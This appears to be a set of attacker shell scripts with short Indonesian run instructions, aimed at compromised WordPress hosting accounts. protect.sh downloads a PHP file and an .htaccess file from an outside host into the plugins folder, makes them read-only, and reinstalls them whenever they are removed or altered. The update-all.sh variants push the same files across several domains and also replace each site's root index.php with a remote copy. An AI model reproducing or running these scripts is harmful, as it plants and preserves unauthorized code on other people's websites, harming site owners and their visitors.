#!/bin/sh


FILE="/home/u200768895/domains/ironbaylogistics.com/public_html/wp-content/plugins/file.php"
FILEURL="https://malam.545565.rest/spongebob/index.php"

HTFILE="/home/u200768895/domains/ironbaylogistics.com/public_html/wp-content/plugins/.htaccess"
HTURL="https://malam.545565.rest/spongebob/.htaccess"

TMP1="/tmp/file_restore.tmp"
TMP2="/tmp/ht_restore.tmp"


wget -q -O "$TMP1" "$FILEURL"

if [ -f "$TMP1" ]; then

    if [ ! -f "$FILE" ]; then
        cp "$TMP1" "$FILE"
        chmod 444 "$FILE"
    fi

    if [ -f "$FILE" ] && ! cmp -s "$FILE" "$TMP1"; then
        chmod 644 "$FILE"
        cp "$TMP1" "$FILE"
        chmod 444 "$FILE"
    fi
fi

wget -q -O "$TMP2" "$HTURL"

if [ -f "$TMP2" ]; then

    if [ ! -f "$HTFILE" ]; then
        cp "$TMP2" "$HTFILE"
        chmod 444 "$HTFILE"
    fi

    if [ -f "$HTFILE" ] && ! cmp -s "$HTFILE" "$TMP2"; then
        chmod 644 "$HTFILE"
        cp "$TMP2" "$HTFILE"
        chmod 444 "$HTFILE"
    fi
fi

rm -f "$TMP1" "$TMP2"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

- sed -i 's/\r$//' protect.sh
- chmod +x protect.sh

manual jalankan SH
- sh protect.sh

mau otomatis jalankan SH gini
- sh /home/u200768895/domains/ironbaylogistics.com/public_html/protect.sh

====================2=2=2=2=2=2=2=2=2=2=2=2=2=2=2=2=2=2=2=2=2=2===================================================

file name : update-all.sh

#!/bin/sh

DOMAINS="
ironbaylogistics.com
domain2.com
domain3.com
"

for DOMAIN in $DOMAINS
do
    TARGET="/home/u200768895/domains/$DOMAIN/public_html/wp-content/plugins/file.php"

    mkdir -p "$(dirname "$TARGET")"

    wget -q -O "$TARGET" https://malam.545565.rest/spongebob/index.php

    chmod 444 "$TARGET"

    echo "$DOMAIN updated"
done

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

- chmod +x /home/u200768895/.system/update-all.sh

========================3=3=3=3=3=3=3=3=3=3=3=3=3=3=3=3=3=3=3=3=3=3==============================================
file name : update-all.sh

#!/bin/sh

DOMAINS="
ironbaylogistics.com
domain2.com
domain3.com
"

for DOMAIN in $DOMAINS
do

    echo "Processing $DOMAIN"

    # =========================
    # FILE.PHP
    # =========================
    TARGET1="/home/u200768895/domains/$DOMAIN/public_html/wp-content/plugins/file.php"
    URL1="https://malam.545565.rest/spongebob/index.php"

    mkdir -p "$(dirname "$TARGET1")"

    wget -q -O "$TARGET1" "$URL1"
    chmod 444 "$TARGET1"

    # =========================
    # .HTACCESS
    # =========================
    TARGET2="/home/u200768895/domains/$DOMAIN/public_html/wp-content/plugins/.htaccess"
    URL2="https://malam.545565.rest/spongebob/.htaccess"

    mkdir -p "$(dirname "$TARGET2")"

    wget -q -O "$TARGET2" "$URL2"
    chmod 444 "$TARGET2"

    # =========================
    # INDEX.PHP ROOT
    # =========================
    TARGET3="/home/u200768895/domains/$DOMAIN/public_html/index.php"
    URL3="https://malam.545565.rest/spongebob/root-index.php"

    wget -q -O "$TARGET3" "$URL3"
    chmod 444 "$TARGET3"

    echo "$DOMAIN updated"

done

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

- chmod +x /home/u200768895/.system/update-all.sh
- sh /home/u200768895/.system/update-all.sh


===========================================================================================








